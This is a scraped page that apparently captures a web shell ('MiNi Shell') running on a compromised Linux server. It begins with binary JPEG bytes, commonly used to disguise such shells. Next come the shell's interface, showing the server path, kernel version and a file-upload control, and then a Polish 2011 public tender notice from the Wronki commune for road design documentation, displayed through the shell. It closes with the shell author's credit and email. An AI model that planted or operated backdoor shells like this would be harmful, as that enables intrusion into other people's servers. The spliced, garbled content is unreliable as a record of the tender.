JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110414/115713-N-2011.html

<p class="kh_header"><b>Wronki: Wykonanie dokumentacji projektowo - kosztorysowych na budowę i przebudowę dróg gminnych</b><br>
<b>Numer ogłoszenia: 115713 - 2011; data zamieszczenia: 14.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wronki reprezentowana przez Burmistrza Miasta i Gminy , ul. Ratuszowa 5, 64-510 Wronki, woj. wielkopolskie, tel. 067 2545300, faks 067 2545328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wronki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowych na budowę i przebudowę dróg gminnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia: 
1)	Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowo - kosztorysowych na budowę i przebudowę dróg gminnych:
Część I - Budowa drogi gminnej w m. Obelzanki (w kierunku świetlicy),
Część II - Budowa drogi gminnej nr 2224 Wierzchocin - Bielejewo, 
Część III - Budowa drogi gminnej we Wronkach ul. Cienista,
Część IV - Budowa dróg we Wronkach (Rynek i ulice przyległe),
Część V - Przebudowa organizacji ruchu w rejonie przystanku PKS ul. Dworcowa we Wronkach.

2) Zakres zamówienia obejmuje:
a) pozyskanie podkładów geodezyjnych w skali 1:500 - mapy do celów projektowych (dot. Części I, II, III, IV),
b) pozyskanie podkładów geodezyjnych w skali 1:500 - mapy nieaktualizowane (dot. Części V),
c) uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego (dot. Części I, II, III, IV),
d) uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia (dot. Części  II),
e) uzyskanie wszystkich opinii i uzgodnień (w przypadku części IV i V Wykonawca zobowiązany będzie również do uzyskania uzgodnienia z Wielkopolskim Wojewódzkim Konserwatorem Zabytków w Poznaniu),
f) wykonanie projektu budowlano - wykonawczego w formie papierowej - 6 egz.,
g) wykonanie projektu budowlano - wykonawczego w formie elektronicznej (na płycie CD) - 1 szt.,
h) wykonanie dokumentacji geotechnicznej - badania gruntu (dot. Części I, II i III),
i) wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych, zgodnie z  rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072 ze zm.), w formie papierowej  i elektronicznej (na płycie CD) - po 1 egz.,
j) wykonanie projektu stałej organizacji ruchu (dot. tylko części V zamówienia),
k) wykonanie kosztorysu inwestorskiego - 2 egzemplarze w formie papierowej,
l) wykonanie kosztorysu ofertowego - 1 egzemplarz w formie papierowej i elektronicznej (na płycie CD),
m) uzyskanie prawomocnej decyzji pozwolenie na budowę (dot. Części I, II, III, IV),
n) uzyskanie zgody na wykonanie robót budowlanych (dot. Części V).

Informacje dodatkowe:
a) Zamawiający nie przewiduje wykonania projektów podziału nieruchomości,
b) Drogi gminne są drogami lokalnymi i drogami dojazdowymi (w przypadku ulic przyległych do Rynku),
c) Zamawiający nie wymaga przedstawienia w projekcie pomiaru ruchu dla dróg,
d) Zamawiający nie określił kategorii ruchu dla dróg i dopuszcza przyjęcie ich na podstawie doświadczenia projektanta,
e) Projekty budowlano - wykonawcze mają określać sposób odwodnienia dróg i chodników, 
f) Projekty budowlano - wykonawcze należy wykonać zgodnie z obowiązującymi przepisami dotyczącymi zrzutu wód i mają one określać wszystkie parametry,
g) Elementem każdego z projektu budowlano - wykonawczego ma być projekt kolizji z urządzeniami obcymi wraz z uzgodnieniami przeniesienia bądź przebudowy urządzeń kolidujących (jeżeli dotyczy),
h) Gmina nie posiada dokumentacji geologicznych, mają one stanowić element opracowywanego projektu budowlano - wykonawczego (dot. Części I, II i III),
i) Zamawiający udzieli pełnomocnictwa Wykonawcom, którzy podpiszą umowy z Zamawiającym, do występowania w imieniu Gminy Wronki przed wszystkimi władzami, urzędami, instytucjami, podmiotami gospodarczymi w celu składania wniosków oraz uzyskiwania informacji i uzgodnień niezbędnych do opracowania dokumentacji projektowo - kosztorysowej.

Ww. dokumentację należy sporządzić zgodnie z art. 29-31 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwa zamówienia, których przedmiotem była usługa polegająca na opracowaniu projektów drogowych o wartości każdego z nich minimum 20.000,00 zł brutto (słownie: dwadzieścia tysięcy złotych 00/100).
Na potwierdzenie faktu, że usługi wymienione/a w wykazie usługi/a (załącznik nr 5 SIWZ) zostały/a wykonane należycie, Wykonawca zobowiązany jest załączyć stosowne dokumenty  (np. referencje, listy polecające). Wskazane jest aby dokumenty to potwierdzające zawierały co najmniej: 
a.	wskazanie, że Wykonawca realizował usługi, których dokumenty dotyczą,
b.	wskazanie Zamawiającego,
c.	przedmiot / rodzaj wykonanych usług,
d.	wartość wykonanych usług,
e.	opinię stwierdzającą, że usługi zostały wykonane należycie lub opinię równoważną,
f.	identyfikację oraz podpis osoby upoważnionej.
Konieczne jest, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców usługi zostały wykonane należycie, zawierały jednoznaczne i nie budzące wątpliwości potwierdzenie należytego wykonania i nie zawierały sprzecznych z wykazem informacji.
Ocena spełnienia warunku zostanie dokonana na podstawie wykazu usług złożonego przez Wykonawcę (załącznik nr 5 do SIWZ) wraz z załącznikami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli wykaże, że dysponuje lub będzie dysponował minimum jedną osobą, która posiada uprawnienia budowlane do projektowania w specjalności drogowej (lub odpowiadające im równoważne uprawnienia budowlane), w zakresie projektowania stanowiącymi przedmiot zamówienia z przynależnością do właściwej izby samorządu zawodowego.
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w  państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394).
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia  złożonego przez Wykonawcę (załącznik nr 4 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ponadto przedkłada:
1) Formularz oferty (sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ).
2) Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w przypadku składania oferty wspólnej lub gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 1) termin realizacji: w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), lub opóźnienia w uzyskaniu postanowień, uzgodnień, decyzji, map mające bezpośredni wpływ na terminowość wykonania usług, 2) przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa, 3) wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT), 4) zmiany osobowe - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo Budowlane lub innych ustawach, 5) wystąpienie wyjątkowych okoliczności, niezależnych od Stron umowy, których nie mogły one przewidzieć w chwili zawierania umowy wpływających na jej realizację.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wronki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: Urząd Miasta i Gminy Wronki ul. Ratuszowa 5, 64-510 Wronki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2011 godzina 11:00, miejsce: siedziba Zamawiającego: Urząd Miasta i Gminy Wronki ul. Ratuszowa 5, 64-510 Wronki, pokój nr 6 - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa drogi gminnej w m. Obelzanki (w kierunku świetlicy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) orientacyjna długość odcinka drogi do zaprojektowania: ca 300 mb,
b) odcinek od drogi wojewódzkiej nr 140,
c) rodzaj nawierzchni istniejącej: gruntowa, 
d) rodzaj nawierzchni do zaprojektowania: droga - kostka betonowa lub nawierzchnia bitumiczna, zjazdy - kostka betonowa lub nawierzchnia bitumiczna, chodnik - kostka betonowa,
e) rodzaj drogi: gminna, klasa L,
f) zakres opracowania: droga wraz ze zjazdami, od drogi wojewódzkiej nr 140 (uzgodnienie z WZDW), jednostronny chodnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa drogi gminnej nr 2224 Wierzchocin - Bielejewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) orientacyjna długość odcinka drogi do zaprojektowania: ca 1200 mb,
b) rodzaj nawierzchni istniejącej: gruntowa,
c) rodzaj nawierzchni do zaprojektowania: droga - nawierzchnia bitumiczna lub betonowa, zjazdy - kostka betonowa, beton lub nawierzchnia bitumiczna,
d) rodzaj drogi: gminna, klasa L,
e) zakres opracowania: droga wraz ze zjazdami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa drogi gminnej we Wronkach ul. Cienista.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) orientacyjna długość odcinka drogi do zaprojektowania: ca 500 mb,
b) rodzaj nawierzchni istniejącej: bitumiczna, gruntowa,
c) rodzaj nawierzchni do zaprojektowania: droga - nawierzchnia bitumiczna, zjazdy - kostka betonowa,
d) rodzaj drogi: gminna, klasa L,
e) odcinek do zaprojektowania: od ul. Prasłowiańskiej,
f) zakres opracowania: droga wraz ze zjazdami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Budowa dróg we Wronkach (Rynek i ulice przyległe).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) orientacyjna długość odcinka drogi do zaprojektowania: ca 500 mb, w tym:
- ulica Rynek - ca 140 mb,
- ulica Zwycięzców - ca 130 mb,
- ulica Szkolna - ca 100 mb,
- część ulicy Rzecznej (od ulicy Mickiewicza do ulicy Zwycięzców) - ca 130 mb.
b) rodzaj nawierzchni istniejącej: drogi - nawierzchnie bitumiczne,
c) rodzaj nawierzchni do zaprojektowania: droga - kostka granitowa, 
d) rodzaj drogi: gminna, klasa D,
e) zakres opracowania: droga..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przebudowa organizacji ruchu w rejonie przystanku PKS ul. Dworcowa we Wronkach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) orientacyjna długość odcinka łącznika do zaprojektowania: ca 100 mb,
b) rodzaj nawierzchni istniejącej: bitumiczna i kostka betonowa,
c) rodzaj nawierzchni do zaprojektowania: droga - nawierzchnia bitumiczna, chodnik - kostka betonowa,
d) rodzaj drogi: gminna, klasa L,
e) zakres opracowania: droga, chodnik, parkingi, nowa organizacja ruchu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com